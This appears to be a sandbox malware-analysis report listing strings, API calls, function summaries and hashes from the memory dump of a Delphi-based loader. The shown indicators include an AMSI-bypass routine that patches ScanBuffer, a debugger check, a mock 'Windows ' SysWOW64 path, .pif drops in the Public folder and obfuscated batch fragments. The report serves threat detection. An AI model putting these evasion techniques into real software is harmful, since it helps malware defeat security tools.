ScanBuffer, xrefs: 0290F2A7, 0290F5FF, 0290F829, 0290FD90, 0290FE9D, 0290FFB5, 02910389, 02910527, 029106CD, 029107ED, 02910982, 02910A7A, 02910CE3, 02910E89, 02911025, 0291113B, 029111C9, 029114DD, 0291177E, 0291188F, 02911A2C, 02911DD7, 02911EE3, 02912101, 0291221E, 02912539, 029125DA, 0291274E, 0291290E, 02912C30, 02913027, 029132C6, 02913357, 02913711, 029138F3, 02913A67, 02913BEA, 02913C66, 02913E1D, 02914027, 02914285, 029144B7, 029146FB, 02914943, 02914BF9, 02914D5F, 02914EF4, 0291522C, 02915566, 0291587F, 02915BFF, 02915F38, 029161EA, 029163EF, 02916555, 029166C9, 02916745, 029172E8, 02917379, 029177A9, 0291793C, 02917A98, 02917B90, 029180AD, 0291837A, 02918520, 029186AD, 02918841, 029189C0, 02918C37, 02918D2F, 0291914B, 02919424, 02919598, 029197CE, 02919860, 02919B98, 02919F36, 0291A465, 0291AD6B
NtSetSecurityObject, xrefs: 02918DFA
@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or, xrefs: 029149CC
Advapi, xrefs: 0291A516, 0291A525, 0291A534, 0291A543, 0291A57F, 0291A58E, 0291A59D
mssip32, xrefs: 0290F68C, 0290F6BF, 0290F6F2, 02919CF1
NtQueryDirectoryFile, xrefs: 0291A4F3
DlpGetArchiveFileTraceInfo, xrefs: 0291A012
UacInitialize, xrefs: 0290F36F, 0290FA36, 02910179, 0291418D, 02914603, 02914DFC, 029150B8, 0291546E, 0291595B, 02917471, 02918CB3, 029190CF
CryptSIPGetInfo, xrefs: 0290F675
CreateProcessA, xrefs: 0291A55C
NtAccessCheck, xrefs: 0291AB75
EtwEventWriteEx, xrefs: 0291AC74
NEO.c, xrefs: 02914879
NtReadVirtualMemory, xrefs: 0291AB0F
BCryptVerifySignature, xrefs: 0290F78A, 02919E05
NtQuerySecurityObject, xrefs: 0291AB42
Kernel32, xrefs: 0291A561, 0291A570, 0291A5AC
GetProcessMemoryInfo, xrefs: 02919CA7
RtlAllocateHeap, xrefs: 0291A1A3, 0291A209
GET, xrefs: 02911D36
BCryptRegisterProvider, xrefs: 0290F7F0
CreateProcessW, xrefs: 0291A56B
UacScan, xrefs: 0290F30B, 0290F9BA, 0290FAB2, 02910081, 02910C67, 02911245, 02911BA7, 029122BA, 029134CB, 02913695, 029137F6, 0291396F, 02913AF2, 02913CC3, 02913DA1, 02913F2F, 0291443B, 029147F8, 02914A2D, 0291570B, 02915C7B, 02915E40, 0291616E, 0291627B, 029164D9, 029165D1, 02917174, 02917516, 0291772D, 029178C0, 02917B14, 02917FA0, 02918129, 02918282, 02918428, 029185B5, 02918749, 029188C8, 02918B3F, 02918FAD, 029191C7, 029193A8, 0291951C, 02919752, 0291A5C2
MiniDumpWriteDump, xrefs: 02918DD2
NtOpenObjectAuditAlarm, xrefs: 02918DAA
psapi, xrefs: 0291A552
[InternetShortcut], xrefs: 029168CC
DllGetClassObject, xrefs: 0290F3E4, 0290F91B, 02919C74, 0291A944
Initialize, xrefs: 0290F17B, 029100FD, 02910291, 0291042F, 029105D5, 0291088A, 02910F2D, 02911369, 02911813, 0291191D, 02912004, 02912336, 02912656, 0291298A, 02912B38, 02912E91, 0291324A, 029153F2, 02915787, 02915B83, 02915D48, 02915FB4, 029160F2, 029162F7, 0291726C, 02917F24, 02918F31, 02919B1C, 02919EBA, 0291A3E9, 0291A7A3, 0291ACEF
LdrGetProcedureAddress, xrefs: 0291ABDB
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 0291026B
EnumServicesStatusExW, xrefs: 0291A53E
VirtualAlloc, xrefs: 0291A638
C:\Users\Public\aken.pif, xrefs: 02914F85
NtQueryVirtualMemory, xrefs: 0291AA10
MiniDumpReadDumpStream, xrefs: 02918DE6
NtQuerySystemInformation, xrefs: 0291A4D5
C:\\Windows \\SysWOW64\\, xrefs: 02913F02, 02914316
sys.thgiseurt, xrefs: 02914300
FlushInstructionCache, xrefs: 0291A737
SLGatherMigrationBlob, xrefs: 0291A977
NtOpenFile, xrefs: 0291AC41
wintrust, xrefs: 0290F4FB, 0290F52E, 0290F561
endpointdlp, xrefs: 02919FC3, 02919FF6, 0291A029, 0291A05C
IconIndex=, xrefs: 02916931

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
API String ID: 2010126900-181751239
Opcode ID: ac5dee0c9f5d7e5ae78e8a461f9a2444be8e912c8a17c941940ce77f992690e3
Instruction ID: 69594a8282b5b428f0e151bf9048729734c18564be39667064264813b5d4b48d
Opcode Fuzzy Hash: ac5dee0c9f5d7e5ae78e8a461f9a2444be8e912c8a17c941940ce77f992690e3
Instruction Fuzzy Hash: 6F24FA3CB5021C8FDB51EB68DC90ADE73BBBF94304F1081E2A609E7255DA70AE918F55

Function 028F5A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,028F0000,0291E790), ref: 028F5A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028F5AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028F5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028F5B37
RegQueryValueExA.ADVAPI32(?,028F5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028F5B7D,?,80000001), ref: 028F5B55
RegCloseKey.ADVAPI32(?,028F5B84,00000000,?,?,00000000,028F5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028F5B77
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028F5B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028F5BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028F5BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028F5BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028F5C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028F5C97

Strings

Software\Borland\Delphi\Locales, xrefs: 028F5AE4
Software\Borland\Locales, xrefs: 028F5AA8, 028F5AC6

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: fe8b462e5e04cf6be75046830ad1554678978166be5461486acceddfcf82c74d
Instruction ID: 50f0be4458978c2e47f1d282a1b79053d3e40cff412d0d582aaac5ed7f68ddf5
Opcode Fuzzy Hash: fe8b462e5e04cf6be75046830ad1554678978166be5461486acceddfcf82c74d
Instruction Fuzzy Hash: 0851997DA4024CBEFB61D6E8CC46FEF77BD9B04744F8001A1A709E6181D7789A448F61

Function 0290F024 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 0290F034
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0290F046
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0290F05D

Strings

KernelBase, xrefs: 0290F02F
CheckRemoteDebuggerPresent, xrefs: 0290F040

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 0b73b29d8488b64e292a5bdafeb5c9a6df4681195fa40da28f551ec20670ddd5
Instruction ID: c1e2ec2c27a0e5adb6bd29f4f70187e23f4538f60bf4113f2788771c1602b405
Opcode Fuzzy Hash: 0b73b29d8488b64e292a5bdafeb5c9a6df4681195fa40da28f551ec20670ddd5
Instruction Fuzzy Hash: 89F0A734A0425CAED720B6A888C8BDDFBBD5B15728F6443D4A475B25C1EB790790C661

Function 0290DFE4 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 028F4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290E0B4), ref: 0290E01F
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0290E0B4), ref: 0290E04F
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0290E064
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0290E090
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0290E099

Part of subcall function 028F4C0C: SysFreeString.OLEAUT32(0290ED84), ref: 028F4C1A

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 47ff211c5c136d3e75b74a67e891c6cf599391e8bad952fdd7c5c1327bc448f9
Instruction ID: d1e7dfd52233cea2009437623a10e9f06969051f7d827d3d555fcc5895b09107
Opcode Fuzzy Hash: 47ff211c5c136d3e75b74a67e891c6cf599391e8bad952fdd7c5c1327bc448f9
Instruction Fuzzy Hash: 69219175B5030CBEEB51EAD8CC86FDF77BDAB48704F500462B700E71C0D6B4AA458A65

Function 0290E72C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0290E86A

Strings

ScanBuffer, xrefs: 0290E7B3
Initialize, xrefs: 0290E75A
OpenSession, xrefs: 0290E80C

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 6a6d3300160fdd106638b64aa834133ac8266706f5a83da6cf5cd6083d4cd8bd
Instruction ID: 590e2b86d3cddacc158ea5cebd5662ba0b5197d0576ad32673a7d57aaea2c3ca
Opcode Fuzzy Hash: 6a6d3300160fdd106638b64aa834133ac8266706f5a83da6cf5cd6083d4cd8bd
Instruction Fuzzy Hash: 3541E43DB1010C9FEB51EBA8D881A9FB7FAEF84710F114836E641E7295DA74AD018F15

Function 02907CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02908018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908088,?,?,00000000,?,029079FE,ntdll,00000000,00000000,02907A43,?,?,00000000), ref: 02908056
Part of subcall function 02908018: GetModuleHandleA.KERNELBASE(?), ref: 0290806A

Part of subcall function 029080C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02908148,?,?,00000000,00000000,?,02908061,00000000,KernelBASE,00000000,00000000,02908088), ref: 0290810D
Part of subcall function 029080C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908113
Part of subcall function 029080C0: GetProcAddress.KERNEL32(?,?), ref: 02908125

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907D6C

Strings

Ntdll, xrefs: 02907D43
yromeMlautriVetirW, xrefs: 02907D13

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: 83ef961ce2bc0d2fdb83f79bd58a953e95d2e9edf2867784702d77bf91027edf
Instruction ID: d6b9593cbfc8e81e7c033d7e5d8ffaab3a29d345b23a6277707630ab00496af4
Opcode Fuzzy Hash: 83ef961ce2bc0d2fdb83f79bd58a953e95d2e9edf2867784702d77bf91027edf
Instruction Fuzzy Hash: 8A012D79B44309AFDB40EF98D881EABB7EDEF8D710F514851BA00D76D0C630A9108B61

Function 02906D48 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02906CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02906D39,?,?,?,00000000), ref: 02906D19

CoCreateInstance.OLE32(?,00000000,00000005,02906E2C,00000000,00000000,02906DAB,?,00000000,02906E1B), ref: 02906D97

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 74d11edd100c011c062d413e446c65a3136f13dec349e0bd54415e3790c072af
Instruction ID: c6fe8abdea86918149d2d3714739d80b8ae00c77a3b34cacae582e2b60416c12
Opcode Fuzzy Hash: 74d11edd100c011c062d413e446c65a3136f13dec349e0bd54415e3790c072af
Instruction Fuzzy Hash: BF01F275208708AEF715DF64DCA286FBBADE789B10B520835F601E26C0E7309930C865

Function 028F1724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,028F1FC1), ref: 028F17D0
Sleep.KERNEL32(0000000A,00000000,?,028F1FC1), ref: 028F17E6

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d935895ddfb84c681322f98be10373775f48733f972f65dd68fed9750ea56c06
Instruction ID: 357ef213296c91f3efba982b376c84aee94289d4607a0eb4ea48774235f5b769
Opcode Fuzzy Hash: d935895ddfb84c681322f98be10373775f48733f972f65dd68fed9750ea56c06
Instruction Fuzzy Hash: B4B1667EA05352CBCB55CF6CE588B61BBE1EB84324F1886AED64DCB385C7349461CB90

Function 02908704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 0290870D

Part of subcall function 029080C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02908148,?,?,00000000,00000000,?,02908061,00000000,KernelBASE,00000000,00000000,02908088), ref: 0290810D
Part of subcall function 029080C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908113
Part of subcall function 029080C0: GetProcAddress.KERNEL32(?,?), ref: 02908125

Part of subcall function 02907CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907D6C

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0290876C

Strings

W, xrefs: 02908719
amsi, xrefs: 02908708
DllGetClassObject, xrefs: 02908732

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 4e195c716d69c770dd99196cf2d0fc140b89f8f212598b5083edd7f7236881d0
Instruction ID: 0bfeb8569c47ff9c0d9cea331d8d49edbf46b119708a9b0a2331adbbd881191b
Opcode Fuzzy Hash: 4e195c716d69c770dd99196cf2d0fc140b89f8f212598b5083edd7f7236881d0
Instruction Fuzzy Hash: 0CF0A45054C385BDE200E6788C85F4BBFCD4B91234F048B1CB2E8962D2D679E10487B7

Function 028F1A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,028F1FE4), ref: 028F1B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,028F1FE4), ref: 028F1B31

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 82658ae23ffde26d9cdc924f2039de17d696fd244bc1065056b7e6d3ee581a9d
Instruction ID: 31ca9600ff7a84221d897276dec16db32e88a865ad25c8dcb7a6ab51cb2c8f40
Opcode Fuzzy Hash: 82658ae23ffde26d9cdc924f2039de17d696fd244bc1065056b7e6d3ee581a9d
Instruction Fuzzy Hash: 9451FD3DA05240CFDB95CF6CD988B66BBD0AB45328F1881AED64CCB286E774C445CBA1

Function 0290E72A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0290E86A

Strings

ScanBuffer, xrefs: 0290E7B3
Initialize, xrefs: 0290E75A
OpenSession, xrefs: 0290E80C

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: a0c3e518f2fa57e5bde496a58546556de9e176fe5b86f10c6c5f24b1d403eac1
Instruction ID: 315a7eae050a5348be1d455d8f98788d68ef3b0c8da84002546e9db21c13dd6c
Opcode Fuzzy Hash: a0c3e518f2fa57e5bde496a58546556de9e176fe5b86f10c6c5f24b1d403eac1
